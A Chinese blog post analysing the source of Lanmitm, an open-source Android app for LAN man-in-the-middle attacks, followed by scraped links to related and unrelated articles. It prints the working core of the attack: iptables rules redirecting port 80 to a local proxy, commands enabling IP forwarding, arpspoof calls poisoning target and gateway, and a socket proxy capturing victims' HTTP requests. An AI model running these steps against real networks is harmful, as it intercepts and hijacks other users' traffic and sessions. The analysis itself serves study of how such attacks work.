0x00

Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话。被攻击机器和server表面上工作正常,实际上已经被中间人劫持。能够从一张图来明确这个过程。

受攻击主机发送的数据,首先经过了攻击者。从server返回的数据也经过攻击者,再发送给受攻击主机。

0x01

Android开源中间人攻击样例。请參考https://github.com/ssun125/Lanmitm。我们这里主要分析这个链接中效果预览中会话劫持的原理。

watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" alt="" />

分析https://github.com/ssun125/Lanmitm源码,要实现arp欺骗,有关键的四步:

1、使用Iptables进行NAT数据包转发

	public static final String[] PORT_REDIRECT_CMD = {
"iptables -t nat -F",
"iptables -F",
"iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",
"iptables -P FORWARD ACCEPT",
"iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "
+ AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT };

这个命令是在ProxyService类的startHttpProxy方法中调用的。

2、开启端口转发,同意本机像路由器那样转发数据包

	private String[] FORWARD_COMMANDS = { "echo 1 > /proc/sys/net/ipv4/ip_forward",
"echo 1 > /proc/sys/net/ipv6/conf/all/forwarding" };

这个是在ArpService类的onStartCommand方法中调用的。

3、ARP投毒

		if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
if (target_ip == null)
target_ip = AppContext.getTarget().getIp(); if (!target_ip.equals(AppContext.getGateway()))
arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + target_ip + " "
+ AppContext.getGateway();
else
arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + AppContext.getGateway() + " "
+ target_ip; arpSpoof = new Thread() { @Override
public void run() {
ShellUtils.execCommand(arp_spoof_cmd, true, false);
}
};
arpSpoof.start();
}
if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
+ " -t " + AppContext.getGateway() + " "
+ AppContext.getIp(); arpSpoofRecv = new Thread() {
@Override
public void run() {
ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
}
};
arpSpoofRecv.start();
}

这个是在ArpService类的onStartCommand方法中调用的。

4、在攻击者机器依据Socket原理,创建一个WebServer,原理相似于使用NanoHttpd实现简易WebServer

这样被攻击者发送给攻击者的请求就能被获取。而且显示在界面上。

核心的代码例如以下:

public class HttpProxy extends Thread {
......
@Override
public void run() {
try {
mServerSocket = new ServerSocket();
mServerSocket.setReuseAddress(true);
mServerSocket.bind(
new InetSocketAddress(AppContext.getInetAddress(),
HTTP_PROXY_PORT), BACKLOG);
executor = Executors.newCachedThreadPool();
while (!stop) {
Socket client = mServerSocket.accept();
DealThread dealThread = null;
switch (mProxyMode) {
case MODE_PROXY_SIMPLE:
dealThread = new SimpleDealThread(client,
mOnRequestListener);
break;
case MODE_PROXY_DEEP:
dealThread = new DeepDealThread(client, mOnRequestListener);
break;
}
executor.execute(dealThread);
}
} catch (IOException e) {
e.printStackTrace();
} finally {
if (mServerSocket != null) {
try {
mServerSocket.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (executor != null) {
executor.shutdownNow();
}
}
}
......
}

Android 中间人攻击的更多相关文章

  1. Android安全之Https中间人攻击漏洞

    Android安全之Https中间人攻击漏洞 0X01 概述   HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. ...

  2. 【Android编程】android平台的MITM瑞士军刀_cSploit源码解析及中间人攻击复现

    /文章作者:Kali_MG1937 作者博客ID:ALDYS4 QQ:3496925334 未经允许,禁止转载/ 何为MITM欺骗,顾名思义,中间人攻击的含义即为在局域网中充当数据包交换中间人的角色 ...

  3. 如何避免遭受HTTS中间人攻击

    先前为大家说明了如何对App的HTTPS通讯进行中间人攻击,听起来很吓人吧-表示若是使用手机的网银或购物等App,便有可能暴露在风险之中. 会发生HTTPS遭受拦截的主要原因是客户端的App未对服务器 ...

  4. 谈HTTPS中间人攻击与证书校验(二)

    上文说到HTTPS的三次握手:http://www.cnblogs.com/wh4am1/p/6616851.html 不懂的再回头去看看 三.中间人攻击 https握手过程的证书校验环节就是为了识别 ...

  5. 中间人攻击 -- Cookie 喷发

    0x00 前言 分享个中间人攻击姿势,屡试不爽. 原本是篇老文,不过写的太啰嗦.今天用简明的文字,重新讲一遍. 0x01 原理 传统 cookie 嗅探,只能获得用户主动访问的站点.不访问就抓不到,效 ...

  6. 中间人攻击(MITM)姿势总结

    相关学习资料 http://www.cnblogs.com/LittleHann/p/3733469.html http://www.cnblogs.com/LittleHann/p/3738141. ...

  7. 转:中间人攻击利用框架bettercap测试

    0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携.易扩展 0x02特点 提到中间人攻击,最知名 ...

  8. Ettercap中间人攻击--介绍

    前言 Ettercap有四种界面:Text,Curses,GTK2,Daemonize. -T      命令行界面,只显示字符.通常与配套的参数有-q(安静模式),加上该选项,则不会显示抓到的数据包 ...

  9. 中间人攻击破解HTTPS传输内容

    最近App安全受到不小的關注,有人問我,說某某App不安全,究竟是真的還假的啊...所謂有被攻擊的風險,是不是危言聳聽,只是為了嚇人來著的? 現在就來為各位說明一下,是怎麼個不安全法.就來說說攻擊是怎 ...

随机推荐

  1. 【2018 CCPC网络赛】1004 - 费马大定理&数学

    题目地址:http://acm.hdu.edu.cn/showproblem.php?pid=6441 Knowledge Point: 1. 费马大定理:当整数n >2时,关于x, y, z的 ...

  2. codevs 2853 方格游戏--棋盘dp

    方格游戏:http://codevs.cn/problem/2853/ 这和传纸条和noip方格取数这两个题有一定的相似性,当第一眼看到的时候我们就会想到设计$dp[i][j][k][l]$(i,j表 ...

  3. Linux vim指令学习

    每天查看一遍vim文档 Linux系统下命令:$ vimtutor 1.可视模式([v] 或者 [Ctrl + v])下的[U]把选中的文本变为大写 .[u]把选中的文本变为小写. 2.[数字] + ...

  4. C#对象初始化的探讨

    最近在弄MQ的性能监测数据埋点,无疑中用到一个Nstatsd的客户端,看到里面写过里面一种嵌套类的写法.代码如下: 客户端Client是一个密封的类,并且构造函数私有访问.然后又用一个嵌套类Curre ...

  5. CentOS 7下安装Composer + Laravel

    1.wget https://dl.laravel-china.org/composer.phar -O /usr/local/bin/composer chmod a+x /usr/local/bi ...

  6. 分享一段代码,关于List

    @SuppressWarnings("unchecked") public List<LogisticsOrderType> getAllLogisticsOrderT ...

  7. python request包使用指西

    request是Python的一个网络模块包,使用它可以快速写一些强大的爬虫脚本

  8. [HNOI2004]宠物收养场(Treap)

    洛谷传送门 这题真是恶心,一开始没理解题意. 原来如果有狗,狗就会存在收养场中,直到有人来领养: 如果有人,人也会存在收养场中,直到有狗来被领养. 就是建一个treap,狗来把狗插进去,人来后把狗领养 ...

  9. 常见的 Android 新手误区

    在过去十年的移动开发平台中,作为资深的移动开发人员,我们认为Android平台是一个新手最广为人知的平台.它不仅是一个廉价的工具,而且有着良好的 开发社区,以及从所周知的编程语言(Java),使得开发 ...

  10. codeforces 1041 d 二分

    题意转化:有一些区间,要求选一些连续的区间.两两区间间隔的和要求小于H.要求区间的长度和尽可能长. 二分区间长度的和,check一下就行 #include <bits/stdc++.h> ...